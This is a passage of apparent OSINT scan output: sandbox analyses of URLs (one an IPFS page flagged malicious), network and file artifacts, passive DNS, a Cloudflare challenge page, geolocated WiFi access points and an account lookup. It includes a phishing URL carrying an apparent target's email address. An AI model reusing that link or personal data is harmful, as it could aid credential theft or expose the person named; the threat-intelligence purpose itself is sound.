u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"199.60.103.254:443"\n "104.17.244.204:443"\n "104.19.154.83:443"\n "34.74.170.74:443"\n "142.251.46.202:443"\n "142.251.46.227:80"\n "142.251.46.227:443"\n "172.64.154.85:443"\n "104.17.127.171:443"\n "104.17.113.176:443"\n "104.17.67.176:443"\n "104.17.231.204:443"\n "104.19.155.83:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "forms.hubspot.com"\n "info.pcmiler.com"\n "no-cache.hubspot.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_344_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "DBWinMutex"\n "IsoScope_344_IESQMMUTEX_0_303"\n "IsoScope_344_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_344_IESQMMUTEX_0_331"\n "IsoScope_344_IE_EarlyTabStart_0x404_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_836"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_344_ConnHashTable<836>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00001008) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3728 -s 132" (UID: 00000000-00001008)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3728 -s 132" (UID: 00000000-00001008)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab1B6B.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00000944]\n "~DF58A3C7FC46791459.TMP" has type "data"- Location: [%TEMP%\\~DF58A3C7FC46791459.TMP]- [targetUID: 00000000-00000836]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000944]\n "9FF67FB3141440EED32363089565AE60_A615E3E02EF226C595CCB8A65F518E46" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_A615E3E02EF226C595CCB8A65F518E46]- [targetUID: 00000000-00000944]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00000944]\n "Tar1B6C.tmp" has type "data"- Location: [%TEMP%\\Tar1B6C.tmp]- [targetUID: 00000000-00000944]\n "E87CE99F124623F95572A696C80EFCAF_4D168D4419431996C7034D53B3EACCBC" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\E87CE99F124623F95572A696C80EFCAF_4D168D4419431996C7034D53B3EACCBC]- [targetUID: 00000000-00000944]\n "OHJEU00P.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OHJEU00P.txt]- [targetUID: 00000000-00000836]\n "~DFA369BD3616ADAA96.TMP" has type "data"- Location: [%TEMP%\\~DFA369BD3616ADAA96.TMP]- [targetUID: 00000000-00000836]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00000836]\n "0GEZRX8E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0GEZRX8E.txt]- [targetUID: 00000000-00000944]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00000944]\n "2CFF2069B7EA2CB5727F7B96AB6C7353" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\2CFF2069B7EA2CB5727F7B96AB6C7353]- [targetUID: 00000000-00000944]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00000944]\n "Tar1B3B.tmp" has type "data"- Location: [%TEMP%\\Tar1B3B.tmp]- [targetUID: 00000000-00000944]\n "A16C6C16D94F76E0808C087DFC657D99_F97E3458719FE8B5437DE55F349865B9" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\A16C6C16D94F76E0808C087DFC657D99_F97E3458719FE8B5437DE55F349865B9]- [targetUID: 00000000-00000944]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /trial36download HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla | 34.74.170.74 |
| 2023-05-12 02:50:37 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link/kshare.html', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link/kshare.html#p.wehnert%40heathus.com', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'https://bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link/', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link/kshare.html#p.wehnert%40heathus.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:2524:304:WilStaging_02"\n "Local\\SM0:2524:304:WilStaging_02"\n "Local\\SM0:2524:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:2524:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"209.94.90.1:443"\n "138.91.254.96:443"\n "104.18.23.52:443"\n "185.199.108.153:443"\n "69.16.175.42:443"\n "20.99.185.48:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "arc.msn.com"\n "bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link"\n "bafybeifs6aeegaj3ly4eg5ueiilwt5tr357zjlb63ngvmcwb5k44fd4jyu.ipfs.w3s.link"\n "code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsbafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.linkkshare.html#p.wehnert%40heathus.com" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006636]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: 00000000-00004224]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00004224]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4224_1061944327\\edge_driver.js]- [targetUID: 00000000-00004224]\n "00e7fb9a-e2bd-4691-8dd2-d2fd1ba42ccc.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 268381"- Location: [%TEMP%\\00e7fb9a-e2bd-4691-8dd2-d2fd1ba42ccc.tmp]- [targetUID: 00000000-00004224]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "f_0004c3" has type "gzip compressed data from Unix original size modulo 2^32 4586386"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c3]- [targetUID: 00000000-00006636]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006636]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4224_1061944327\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004224]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004224]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00004224]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4224_1061944327\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004224]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\4224_1061944327\\Mini-Wallet\\miniwallet.bundle.js]- [targetUID: 00000000-00004224]\n "notification.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\4224_1061944327\\Notification\\notification.bundle.js]- [targetUID: 00000000-00004224]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00004224]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006636]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006636]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006636]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006636]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\4224_910400663\\edge_autofill_field_data.json]- [targetUID: 00000000-00004224]\n "wallet-checkout-eligible-sites.json" has type "ASCII text"- [targetUID: 00000000-00004224]\n "wallet-checkout-eligible-sites-pre-stable.json" has type "ASCII text"- Location: [%TEMP%\\4224_1061944327\\json\\wallet\\wallet-checkout-eligible-sites-pre-stable.json]- [targetUID: 00000000-00004224]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004224]\n "Web Data | 185.199.108.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Private (Net ID: 00:06:B1:20:D3:D2) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 2 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f603759cec44a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="VxcMRN.Povw0Dqbul8wSiWYYVjQ65KTx3XK5wkMYn5s-1683860053-0-ARNnaczlk3lhWY6ESpfReTjviWNfe6-W-F4EYUMujv5K8wYIHcmyGNVxCdUrRWsobOaE65E16LH7Z5A8l3JcOOwM40OukBYU_NTnKQTXBbuAPfHcavNAVkFXDNA4yBYP_F-doeuxJ1iDDtJRrmlmohTnm9Zwgu_y8a0NK2hiUe5yMvTqp63OLXzd1V9ueCyVeeK1caOtPi7xaty2vJtyZb-cIX-pXe1HjTUlpS2SBgDHLt9Z2nGU34h6kZ0-LrtNlJwHFMEUfGQT7Cu-pfqrhaBF1Rf57tLrkAcE4ToZFW0ZJ0AzVaQzLYE6ZtSIvjdhsInZ4x-0ac4WkaSnH9qLZC0frRaKCRbP1YE5yAsA_V_rAzDvledqs23zFkADyA1JndB-r5YTwGkwDl-BxZREbNktpruk72pVubcgN5obrf6JxTrQq7YBfyWH0u231TmHhalG3kCxQTdf9BBK1RtcvNhrrH01RN3jUXWOknSbzfs0xXZvpHYZ1mrWn-Ojnk9ZjOu2ygM5UtHSoZUS6y_CjRifM_gopebOwo_cedROZOf9quaaEku8SOVh2-a-u3HQqhJrHKvyqASEjXgOG-POuVge4L6xHx2SHahOESPnWqqKrSn9BYMIGELPd8-r-1tIAXEFuooehRGS_FYNDjqh6omsTcRWSr06JGoopCVsOBkATKY4nwfmOjHwATatO_bzDcPIKUDDZxN4trvvcVPNVoHO7Bdkn5nD4MlhG7ULR5m8BGChjHXk7lMQgvxBm1SZz89qexKer_mB3ITW_Ckfp4tPj4-YUwZkcw1lp1dwi32IJwgxwAEQrcGYo7Dftq8CYuStupr8lXKN_XUjGqTozvnpHPRsKR3mpnU05jAAbQN-wTNmylPeMG1Bx9YvJ8-oBs6FOj2g79NCurzx8d8F26PjaGqr-vtP8UKYeQxLAnNdd4Vl3r7Sxgy5_U4ONoKkZLnzYO166hvNojFJrl5f4tJq3L8oaK1eV5U-xpdOk_jlFbI7ZzjrEUv9fZQsj5GaeDY02cHxOh7Nt2nNuGIpJ43yd7IG1NCu_ks7x5I0kfXv5MRuTfiROKF9xzm5F_CKasB2amUWk6rZYcXTrxdif9TD5Sx62vXZQpsnSXx8a6qRdl0hIJb_vmia5qIkaGS9V0c3xjS-IDsjcMXU8HgYzlCX19Zu4ALj-qepP0KcZOXiHhiswQ6RmzSNTHY19R5ZletASbYV_KRC2PP48Hz8WCb-SWTTkcwOaIfpq0-9SsU16FZzuVHDtQR9HgY0pbLMzaxY0s1xIpwF0xudNUa9SsK7hj88CJhBWAgyl0DKCHjlEvVNsM3bMb76uUbrGBKt7Hry85yQS5UEcYp6GIRihakXwCelMLh9b6mQeb34LGhQRPvlmLc3f7j1216yXCSaBd223eCCMmrLoB2g3nLwqwrk_PW2t_XaPAxAsSOOJKzId4VjA2dn6CqsOQIQ1btvcUPfq3OsFea8XgUx2qTK18l8oqMYjxkPX_FOwTDrD8XvSUg990Ur0PezzJ7ZjQhXW2g96qU5HlxCcEgvTZ1Oj8VsRG6KYZKs3liq65P7yZ1Xq0PuWGs5ZH1HZuwe_EUK0ctlgYcA2TZqiqR97ljhOugKeylE_8hYvCH-_EfG3w8eyicUcZHEEbELHsNXehd76Tx3s2-ebSEw5k9zImyOFTenD_lgPbpq7QTz7xoj2el_vnfxew2WRomnN2o-3wrcdpxXZbyRqTVEwh9mt5ldOWHagonTAv_Q_hf6-IdMAwmmBbSh1Hcp5U00qxCfbSDlsw6TbCjryraM_n5MuyIQ3ROmpzau0nYDihwg55Yfm_maTyXQn3EfPcgCTbGbUA-S1IM4kEvznOEUMKan7limYnMnSACdDa6YllLFkTxfyt9PIWPkMFkg4rul1WrPg6PbIgC6s9asfdQz_qx66otvL3jKY2qeghrw_6pmQyfsLCIHyZFw1XaoIueMg-cFKFmIkcBABdWmDDrGq0ut54mYbYK3SFGC_bIHhtVHYt9KTDDqI94HFGgN1Tmq0OS0w3l63uBrjPR2ghPB-fwrkk0mrJ7qhhXURTs1sofuhT9GcdvnMZ1lpgzcElp3IhKAYa_lNxP8ZMf4Q_-TfeYlm0PHPqWivHEqU3GArEQlC_hJ27J0JdZxbF8RZT_qsP9FxBGCfGjgHhGcEmTtiLHMzioIBblPCJ2MJyW1yepTP1gLGj1XQw8vPq1sTASJgCcwQdtLYK1gBygsKJ6y9hq73XXqB7BxmSRGE1412ZH9kqHGFcsBJvpgdfjdZDEcUAbc7eHlE_pUs5mqrXq697Qb125fekHxboBa8kmPIcPQ2ynUBwAN74KYjxXYEmrozv8dkXJqol4LZcUANpwiA11Em8xrLpc2lbtTgwaNEHGyTh_5AUbuVj2YXAm8gMv0JlcPNtTwFxCdA8SE7rXhlJ4zCoy8DSlgGYlbvZ8ijwcet19cfaphrxuan5NDwsNqQSGBQBD2ZBY7HKWcOtfFA0IzjpULqXe_VhCzD0_t3-f5YJ6XZO21">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '16187',
cRay: '7c5f603759cec44a',
cHash: '5c1bdda96dc3363',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'HgohT/b1OM4tsUSGEPixuGnvvV+8jkzKLyX45HU4WdoKt1CyoXgioQGLmYcV9DPAxym7ohL+qPU6akoz/3Kv4jDE5qiLpt0g690Z1V0G6KGqGHPkesBGIYJOSkTiujqDpcxocLCBQ79XH7kLAk8OVa7j2xuxhAkf7tykvodsDRO92HgFm6rNoo9Cc4pq9Hw23quQ/Ag/Dw7fHCOPwdkWoIXGKhVsGwr+1oSvb+i62Ffqr2C/t8TudQSZP04EqcjtlKB4l31gRzqm6aULKZZKHQH5dhkngvCigCKNwW3hn9AmxEaT7NKkPj96+xDmNbHesoN2ACk9cb3W/d0YPCDVKR1HT4e51TpStG90quS33mPQQRwHkie3Xs9LUnGj5sG8Duv0tFosQZ0d2HZZW4zbksxXdaP8TmTByfSbYAcfyuU4CzRSX+Y5Rm9J03m+/gTMFWf25epClffMJPvWQuuF8+FuZwLDOXqs2UqxSUCSOXQCyg20Uk8QGVhEnW7SZrLI6C+LyvwhLlehehPxzaKSJs+0ftOeZ0U1P+CWNJ72yzyn1vk/bmC6oIk8nhtMSrxM',
t: 'MTY4Mzg2MDA1My42NjAwMDA=',
m: 'lfsFj6DGCrI2vGPf6BjuX9qKC3b3WJbZzI/myE7y0Ig=',
i1: 'Gu/vYOwR5DI39saTFLv/iA==',
i2: 'jBLnZ6zLXxRsowEZI/3brw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f603759cec44a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f603759cec44a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:50c0:8001::153 | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:50:3C:2C) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:02:2D:26:4A:A6) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | darudar (Category: misc)
